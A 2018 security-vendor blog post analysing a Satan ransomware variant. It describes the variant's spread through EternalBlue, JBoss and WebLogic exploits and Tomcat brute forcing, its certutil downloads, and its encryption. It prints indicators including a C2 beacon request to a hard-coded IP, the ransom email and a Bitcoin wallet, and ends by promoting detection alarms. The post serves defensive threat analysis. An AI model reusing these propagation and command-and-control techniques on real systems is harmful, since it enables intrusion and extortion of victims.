416 reads

Satan Ransomware Spawns New Methods to Spread

by Javier RuizJune 15th, 2018

Too Long; Didn't Read

Today, we are sharing an example of how previously known malware keeps evolving and adding new techniques to infect more systems.

Companies Mentioned

featured image - Satan Ransomware Spawns New Methods to Spread

Today, we are sharing an example of how previously known malware keeps evolving and adding new techniques to infect more systems.

BleepingComputer first reported on Satan ransomware in January 2017. Recently, Satan Ransomware was identified as using the EternalBlue exploit to spread across compromised environments (BartBlaze’s blog). This is the same exploit associated with a previous WannaCry Ransomware campaign. While Microsoft patched the vulnerability associated with EternalBlue in March 2017, many environments remain vulnerable.

Unusually, we’ve identified samples of Satan Ransomware that not only include EternalBlue, but also a far larger set of propagation methods:

This Satan variant attempts to propagate through:

JBoss CVE-2017–12149
Weblogic CVE-2017–10271
EternalBlue exploit CVE-2017–0143
Tomcat web application brute forcing

Malware Analysis

Below is a sample from early May 2018 of Satan Ransomware using all the previously mentioned techniques, which we are going to analyze.

Name: sts.exe

File size: 1.7 Mb

MD5: c290cd24892905fbcf3cb39929de19a5

The first thing we see in the analyzed sample is that the malware was packed with the MPRESS packer:

The main goal of this sample is to drop Satan Ransomware,encrypt the victim’s host, and then request a Bitcoin payment. Afterwards, the sample will also try to spread in the network using exploits such as EternalBlue.

EternalBlue

The malware drops several EternalBlue files in the victim’s host. These files are a public version of the exploit without any modifications or custom implementations. All are dropped in the folder C:\Users\All Users\ in the infected system:

Sts.exe initiates the process of spreading across the network by scanning all the systems within the same network segment. Through the following command line, systems vulnerable to SMB EternalBlue exploit will execute the previously dropped library down64.dll.

The down64.dll attempts to load code in the target’s memory, and then downloads sts.exe, using the legitimate Microsoft certutil.exe tool. This is a known download technique described as Remote File Copy — T1105 in Mitre ATT&CK.

So Many Exploits….

The sample uses some other network activity to continue to spread across the network.

A compromised system will make a HTTP PUT request to /Clist1.jsp to execute a jsp file that downloads another sample of sts.exe in the target server.

Another interesting technique used to infect other systems is the ability to identify an Apache Tomcat server and bruteforce it. It makes an HTTP GET request to /manager/html, and if the response is “401 not authorized,” it then begins to bruteforce access to the file, using a list of most common usernames and passwords:

Encryption

After infecting other systems in the same network, the sample finally drops Satan Ransomware into C:\Satan.exe file. This executable is also packed with MPRESS as the original sample.

Executing Satan.exe starts the ransomware attack, which first stops the following processes:

Satan.exe creates a file named KSession located in “C:\Windows\Temp\KSession” and stores a host identifier inside it.

Encrypted files are renamed with [[email protected]].<original_filename>.satan file name. Then the process starts sending data to the Command and Control server, making GET requests using the parameter value stored in KSession file.

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1 Connection: Keep-Alive

User-Agent: Winnet Client

Host: 45.124.132.119

After encryption, Satan.exe creates a note in C:\_How_to_decrypt_files.txt with instructions, and then executes notepad to open the note.

The note contains the instructions to decrypt the system and a contact email address: satan_pro@mail[.]ru, requesting a Bitcoin payment as seen below in a sample of the note:

Tracking the previously mentioned Bitcoin wallet:

14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo, has only received a handful of payments so far, with the latest payment made on May 12, 2018. It has a balance of 0.5 BTC, worth approximately $3600 at the time of writing.

Conclusion

It’s a worrying trend that ransomware isn’t going away, and it is adapting to include the recent and diverse exploits/techniques to spread in more innovative and successful ways.

Detect Satan Ransomware with AlienVault USM

Because threats like Satan Ransomware are constantly evolving with new methods, it’s critical that your detection tools always have the latest threat intelligence. AlienVault USM receives continuous threat intelligence updates from the AlienVault Labs Security Research Team and OTX. Using multiple built-in security capabilities, AlienVault USM detect many common behaviours of malware that change less frequently. The techniques used to spread Satan ransomware will trigger the following alarms in AlienVault USM:

System Compromise — Suspicious Behavior — OTX Indicators of Compromise
Delivery & Attack — Suspicious Behavior — Certutil.exe used to download a file
Delivery & Attack — Vulnerability Scanning — JBoss Scan
System Compromise — Suspicious Behavior — Command executed from an Oracle WebLogic process

And also the following network activity:

Weblogic XMLDecoder RCE (CVE-2017–10271) — Exploit — Code Execution
Tomcat Server — Environmental Awareness — Default Credentials
Possible ETERNALBLUE Exploit M3 MS17–010 — Exploit — Code Execution — ETERNALBLUE
Satan Ransomware — System Compromise — Ransomware infection

Detect Satan Ransomware with OTX Endpoint Threat Hunter

You can hunt for malware and other threats for free using the OTX Endpoint Threat Hunter.This free service uses the indicators of compromise (IOCs) catalogued in OTX, enabling you to scan for threats on your endpoints. OTX Endpoint Threat Hunter detects Satan through: